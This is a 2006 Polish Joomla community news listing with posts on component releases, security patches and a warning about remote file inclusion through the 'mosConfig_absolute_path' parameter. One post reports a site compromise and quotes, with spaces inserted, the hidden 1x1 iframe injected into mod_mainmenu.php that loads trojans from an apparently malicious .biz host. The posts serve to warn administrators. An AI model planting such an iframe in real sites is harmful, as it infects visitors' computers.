|
Community Builder 1.0.1 - łatka wymagana |
|
Napisał: Piotr Laskowski
|
|
czwartek, 10 sierpień 2006 |
|
Dziś światło dzienne ujrzała poprawka bezpieczeństwa dla Community Builder w wersji 1.0 stable. Aktualizacja jest jak najbardziej zalecana, gdyż przez ten komponent było parę włamań na serwisy, o czym można było przeczytać na forum. Łatkę pobierzemy TUTAJ. Więcej informacji na stronie Joomlapolis.com.
|
|
|
Joomla Power Edition 1.0.10b |
|
Napisał: Artur Moskała
|
|
sobota, 05 sierpień 2006 |
Światło dzienne ujrzała nowa wersji JoomliPE. Poza drobnymi poprawkami dodano z00m Media Gallery z joomlapl.com, Jogadgets (opis tutaj) oraz moduł ostatnich postów i system komentarzy do integracji z forum Przema. Więcej informacji tutaj.
|
|
|
Napisał: Marek Dylewicz
|
|
sobota, 05 sierpień 2006 |
Jak raportuje nam Artur Dudek, trafił na przypadki podrzucania przez
luki w CMSie konia trojańskiego, który później poprzez przeglądarkę
zaraża komputery odwiedzających serwis.
Poniższy kod dodano do mod_mainmenu.php na początku pliku (użyto
prostego kodowania adresu za pomocą znaków ascii):
< iframe src = " http : // zchxsikpgz . biz / dl / adv521 . php " height = " 1 "
width = " 1 " > < / iframe >
(spacje powstawiane umyślnie)
Efekt działania: instaluje się ibm0001.exe i kupa trojanów po otwarciu strony w IE, a w
Firefoxie widać tylko kwadraty przy modułach menu o wielkości 1px x 1px
z obramowaniem.
U Artura ten przypadek dotyczyl wpisu w mod_mainmenu.php
Podobny przypadek opisał też jeden z naszych forumowiczów.
|
|
|
Napisał: Marek Dylewicz
|
|
piątek, 04 sierpień 2006 |
Do naszej pobieralni trafiła dziś nowa wersja z00m Media Gallery - wciąż jednak jeszcze w statusie Release Candidate (ale do tego chyba już się wszyscy przyzwyczaili, ze stabilnej wersji z00m'a nie było od dawna).
Jako nowości w tej wersji autor wymienia wsparcie dla Joom!Fish, wsparcie dla TMEdit support, nowy przycisk 'Zapisz', nowy skrypt High Res zOOm i wiele więcej.
Paczka z komponentem leży TUTAJ, a w oparciu o tłumaczenie zwiastuna złożył ją do całości sogo.
|
|
|
AkoBook z Security Images |
|
Napisał: Marek Dylewicz
|
|
czwartek, 03 sierpień 2006 |
Artur Dudek
podesłał nam zmodyfikowaną przez siebie paczkę z komponentem AkoBook
Plus. Komponent ma silniejszą ochronę przed spamem poprzez zastosowanie
Security Images.
AKTUALIZACJA: Podmieniliśmy plik z komponentem na podrasowany przez sogo - dodane zostały zamiast AIM i MSN komunikatory GG i Tlen.
Paczka do pobrania STĄD, a oto co pisze na jej temat Artur:
|
|
Czytaj całość...
|
|
|
Napisał: Marek Dylewicz
|
|
poniedziałek, 31 lipiec 2006 |
|
Po ostatnich informacjach na temat luk w bezpieczeństwie komponentów do Mambo pojawiły się już niestety kolejne. Podobnie jak w poprzednich przypadkach do ataku wykorzystywana jest niepoprawna weryfikacja
parametru "mosConfig_absolute_path" przed wykonaniem funkcji include
dla innych plików. Warunkiem udanego ataku jest włączona funkcja
register_globals na serwerze WWW.
Tym razem jako potencjalnie niebezpieczne wymieniane są:
Bądzcie czujni i zerkajcie czy są już nowe wersje naprawiające luki!
|
|
|
Joomla SafeMode Patch 1.0.10 |
|
Napisał: Piotr Laskowski
|
|
czwartek, 27 lipiec 2006 |
|
SafeJoomla1.0.10 - paczka zawiera pliki, które należy podmienić, aby można było instalować komponenty, moduły i boty na serwerach, które mają ustawione SafeMode na ON. Zalecamy zrobienie kopii plików przed zamianą.
|
|
|
<< « start < wstecz 51 52 53 54 55 56 57 58 59 60 dalej » > koniec » >>
|
| Pozycje :: 388 - 394 z 538 |
